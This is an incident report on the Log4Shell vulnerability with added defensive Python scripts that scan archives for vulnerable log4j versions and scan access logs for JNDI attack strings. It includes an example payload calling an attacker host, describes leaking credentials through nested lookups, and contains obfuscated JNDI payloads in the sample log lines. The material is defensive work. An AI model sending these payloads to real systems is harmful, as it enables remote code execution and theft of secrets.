Description of the vulnerability
A critical vulnerability, CVE-2021-44228 (commonly called Log4Shell), has been discovered in the Java logging library Apache Log4j 2. Log4j 2 expands ${...} lookups inside logged messages, including JNDI lookups, so if an attacker can cause text of their choosing to be logged by an affected application (a User-Agent header, a username field, anything that ends up in a log statement), a payload such as ${jndi:ldap://attacker.example/x} makes the application connect to a server controlled by the attacker. From there the attacker can achieve a variety of objectives, including:
- Exfiltration of sensitive data such as credentials, by embedding further lookups (for example ${env:AWS_SECRET_ACCESS_KEY}) in the hostname so the values leak through the DNS or LDAP request itself.
- Remote code execution, by serving a malicious class or serialised object from the attacker's LDAP or RMI server.
- Execution of shell commands with the privileges of the application process.
Affected versions
This vulnerability affects Log4j 2 versions from 2.0-beta9 (where the JNDI lookup was introduced) up to and including 2.14.1. Version 2.15.0 shipped an incomplete fix (CVE-2021-45046), so 2.16.0, which disables JNDI lookups by default and removes message lookups entirely, is the first release to treat as fully fixed; the backports 2.12.2 (Java 7) and 2.3.1 (Java 6) carry the same fix. Note that a copy of log4j-core bundled inside a third-party webapp is affected regardless of what your own build declares, so look for the JAR files themselves rather than relying on dependency manifests.
Was Facilitynet affected?
No.
What did we do?
First we performed a quick scan to look for log4j JAR files. The scan of our servers showed that 2 webapps were affected by the vulnerability since they were using a vulnerable version of log4j. The webapps were not actively used so we promptly deleted them from the server.
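The quick JAR scan described above, as an added example that is not Facilitynet's own tooling: a Python script that walks a directory tree, opens every .jar/.war/.ear/.zip, recurses into archives nested inside them (such as WEB-INF/lib/*.jar), reads the version from the pom.properties that Maven-built log4j-core jars ship with, checks whether the JndiLookup class is still present (deleting it was a common stop-gap mitigation), and classifies each hit against the affected range. The sample archives it builds for the demo are constructed fixtures, not real log4j builds.

```python
import io
import os
import re
import zipfile

# Maven metadata shipped inside log4j-core jars; its version= line identifies the build.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# The class that performs JNDI lookups; deleting it from the jar was a common stop-gap mitigation.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")

VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)-?(\d+))?$")
STAGE_RANK = {"alpha": 0, "beta": 1, "rc": 2, None: 3}  # pre-releases sort before the final build

def parse_version(v):
    """'2.0-beta9' -> (2, 0, 0, 1, 9); '2.14.1' -> (2, 14, 1, 3, 0); None if unparseable."""
    m = VERSION_RE.match(v.strip())
    if not m:
        return None
    major, minor, patch, stage, num = m.groups()
    return (int(major), int(minor), int(patch or 0), STAGE_RANK[stage], int(num or 0))

def classify_version(v):
    """CVE-2021-44228 status of a log4j-core version (2.x line only)."""
    t = parse_version(v)
    if t is None or t[0] != 2:
        return "unknown-or-1.x"
    if t < (2, 0, 0, 1, 9):
        return "not-affected"          # the JNDI lookup was introduced in 2.0-beta9
    if t[:2] == (2, 3) and t >= (2, 3, 1, 3, 0):
        return "fixed"                 # Java 6 backport
    if t[:2] == (2, 12) and t >= (2, 12, 2, 3, 0):
        return "fixed"                 # Java 7 backport
    if t < (2, 15, 0, 3, 0):
        return "vulnerable"
    if t < (2, 16, 0, 3, 0):
        return "partial-fix-2.15.0"    # CVE-2021-45046 remained in non-default configurations
    return "fixed"

def inspect_archive(data, name):
    """Findings for one archive given as bytes; recurses into nested jars such as WEB-INF/lib/*.jar."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.M)
            version = m.group(1).strip() if m else "?"
            status = classify_version(version)
            has_class = JNDI_CLASS in names
            if status == "vulnerable" and not has_class:
                status = "mitigated-class-removed"
            findings.append({"archive": name, "version": version,
                             "jndi_class_present": has_class, "effective": status})
        for inner in sorted(names):
            if inner.lower().endswith(ARCHIVE_EXT):
                findings.extend(inspect_archive(zf.read(inner), name + "!" + inner))
    return findings

def scan_tree(root):
    """Walk a directory tree and inspect every archive in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fname)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), path))
    return findings

def build_sample_archive(version, include_jndi_class=True, wrap_in_war=False):
    """Constructed fixture: a minimal fake log4j-core jar, optionally nested inside a war."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "version=%s\nartifactId=log4j-core\n" % version)
        if include_jndi_class:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class file
    if not wrap_in_war:
        return buf.getvalue()
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-%s.jar" % version, buf.getvalue())
    return war.getvalue()

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as root:  # stand-in for a server's webapps directory
        with open(os.path.join(root, "legacy.war"), "wb") as fh:
            fh.write(build_sample_archive("2.14.1", wrap_in_war=True))
        for finding in scan_tree(root):
            print(finding)
```

Point scan_tree at the webapps directory of each server (or at / for a full sweep). A finding whose effective status is "vulnerable" is one the page's quick scan would have caught; "mitigated-class-removed" means the version is in range but someone has already stripped the lookup class, which is worth recording so the jar still gets upgraded later.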
Next we performed a more thorough scan using a vulnerability scanner. This did not turn up any additional affected applications.
We performed a scan of the access logs to see if the vulnerable webapps had been exploited. No attacks were found. We did see some attempts to hit various standard URL locations indicating activity by scanners to catalogue easily exploitable servers.
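The access-log review in the last step, as an added example that is not the original page's tooling: a Python script that parses combined-format access-log lines, undoes the common Log4Shell obfuscations (percent-encoding, ${lower:...}/${upper:...} wrappers and ${::-...} default-value tricks), reports every ${jndi:...} lookup with its protocol and callback host, and separately counts hits on a shortlist of paths that generic scanners probe. The log lines, the addresses in them and the probe-path list are all constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format; addresses are RFC 5737 documentation ranges.
SAMPLE_ACCESS_LOG = [
    '198.51.100.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.45 - - [10/Dec/2021:14:05:32 +0000] "GET /login?user=${jndi:ldap://203.0.113.10:1389/a} HTTP/1.1" 404 512 "-" "curl/7.68.0"',
    '203.0.113.77 - - [10/Dec/2021:15:11:09 +0000] "GET /api/v1/items HTTP/1.1" 200 230 "-" "${${lower:j}${lower:n}${lower:d}${lower:i}:${lower:l}dap://198.51.100.200:1389/x}"',
    '203.0.113.90 - - [10/Dec/2021:15:20:01 +0000] "GET /%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.50%3A1099%2Fo%7D HTTP/1.1" 404 512 "-" "Mozilla/5.0"',
    '192.0.2.33 - - [10/Dec/2021:16:01:44 +0000] "GET /.env HTTP/1.1" 404 512 "-" "python-requests/2.26"',
    '192.0.2.33 - - [10/Dec/2021:16:01:45 +0000] "GET /wp-login.php HTTP/1.1" 404 512 "-" "python-requests/2.26"',
]

# Constructed shortlist of paths that generic internet scanners probe for.
RECON_PATHS = {"/.env", "/wp-login.php", "/phpmyadmin/", "/actuator/health", "/.git/config"}

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")            # innermost ${...} with no nested lookup
JNDI_TARGET = re.compile(r"\$\{jndi:([a-z]+)://([^/:}\s]+)")

def url_decode_fully(s):
    """Undo repeated percent-encoding (%2524 -> %24 -> $) until the text stops changing."""
    prev = None
    while prev != s:
        prev, s = s, unquote(s)
    return s

def _resolve_inner(m):
    body = m.group(1)
    if body.startswith("jndi:"):
        return m.group(0)                  # keep the lookup we are hunting for
    if ":-" in body:
        return body.rsplit(":-", 1)[1]     # ${::-j}, ${env:NOPE:-j} -> the default value "j"
    if body.startswith(("lower:", "upper:")):
        return body.split(":", 1)[1]       # ${lower:j} -> j (text is already lowercased)
    return m.group(0)                      # unknown lookup: leave untouched

def normalize_payload(s):
    """Collapse common Log4Shell obfuscations to a canonical lowercase ${jndi:...} form."""
    s = url_decode_fully(s).lower()
    while True:
        new = INNER_LOOKUP.sub(_resolve_inner, s)
        if new == s:
            return s
        s = new

def classify_line(line):
    """Return a finding dict for a JNDI payload or a recon probe, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Payloads ride in whatever the application logs; path, User-Agent and Referer are the usual carriers.
    for field in ("path", "ua", "referer"):
        hit = JNDI_TARGET.search(normalize_payload(rec[field]))
        if hit:
            return {"kind": "jndi", "ip": rec["ip"], "field": field, "protocol": hit.group(1),
                    "callback_host": hit.group(2), "status": rec["status"]}
    if rec["path"].split("?", 1)[0] in RECON_PATHS:
        return {"kind": "recon", "ip": rec["ip"], "path": rec["path"], "status": rec["status"]}
    return None

def scan_access_log(lines):
    return [f for f in (classify_line(line) for line in lines) if f]

def summarize(findings):
    jndi = [f for f in findings if f["kind"] == "jndi"]
    return {"jndi_attempts": len(jndi),
            "callback_hosts": sorted({f["callback_host"] for f in jndi}),
            "recon_hits": sum(1 for f in findings if f["kind"] == "recon")}

if __name__ == "__main__":
    findings = scan_access_log(SAMPLE_ACCESS_LOG)
    for f in findings:
        print(f)
    print(summarize(findings))
```

Two caveats when reading the output. The access log only shows payloads that landed in fields the web server records (URL, User-Agent, Referer); a payload in a header or POST body the server does not log will not appear, so an empty result rules out less than it seems. And a match is an attempt, not a confirmed compromise: to establish whether one of the vulnerable webapps actually reached out, correlate the extracted callback hosts against outbound LDAP, RMI and DNS traffic from the application servers over the same period.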
Conclusion
Fortunately we were not using any affected versions in our main webapps. This incident shows the need to be more proactive with respect to vulnerability scanning.
We are planning to implement automated vulnerability scanning so we can act with even greater speed in the future.